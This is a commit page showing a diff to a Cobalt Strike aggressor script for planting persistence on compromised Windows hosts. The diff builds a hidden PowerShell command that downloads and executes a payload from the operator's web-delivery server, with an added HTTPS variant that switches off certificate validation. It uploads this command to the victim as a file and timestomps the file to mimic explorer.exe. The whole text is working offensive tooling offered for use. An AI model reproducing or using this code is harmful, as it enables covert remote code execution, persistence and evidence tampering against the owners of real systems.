infosecn1nja
/
persistence-aggressor-script
mirror of https://github.com/infosecn1nja/persistence-aggressor-script.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

updated to reflect "Scripted Web Delivery". 

Thanks @andrewchiles
master
ZonkSec 2016-09-30 08:07:38 -05:00 committed by GitHub
parent bc44ca53b2
commit 677cdc9060
1 changed files with 20 additions and 6 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

26
persistence.cna
View File

@ -94,17 +94,31 @@ alias persistence {
########### Subroutines ############# ########### Subroutines #############
sub checkPSpayload{ sub checkPSpayload{
foreach $site (sites()) { foreach $site (sites()) {
if ($site['Description'] eq "PowerShell Web Delivery"){ # Site description was updated in CS 3.X from "PowerShell Web Delivery" to "Scripted Web Delivery (powershell)"
if ($site['Description'] eq "Scripted Web Delivery (powershell)"){
return true; return true;
} }
} }
} }
sub uploadPSpayload { sub uploadPSpayload {
foreach $site (sites()) { foreach $site (sites()) {
if ($site['Description'] eq "PowerShell Web Delivery"){ if ($site['Description'] eq "Scripted Web Delivery (powershell)"){
$downloadstring = "http://" . $site['Host'] . ":" . $site['Port'] . $site['URI']; if ($site['Port'] eq '443' ){
$data = "powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring(\'" . $downloadstring . "\'))\""; binput($1, "[*] Using HTTPS Powershell Stager");
bupload_raw($1, $payloadPath, $data); # Modified to allow staging over HTTPs if a self-signed cert is used
# Add HTTPS over HTTP
$downloadstring = "https://" . $site['Host'] . ":" . $site['Port'] . $site['URI'];
# Disable certficate validation checking
$data = 'powershell.exe -nop -w hidden -c "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};';
$data = $data . "IEX ((new-object net.webclient).downloadstring(\'" . $downloadstring . "\'))\"";
}
else {
$downloadstring = "http://" . $site['Host'] . ":" . $site['Port'] . $site['URI'];
$data = "powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring(\'" . $downloadstring . "\'))\"";
}
binput($1, "[*] Attempting to upload persistence file: $2");
bupload_raw($1, $2, $data);
btimestomp($1,$2,'C:\Windows\explorer.exe')
} }
} }
} }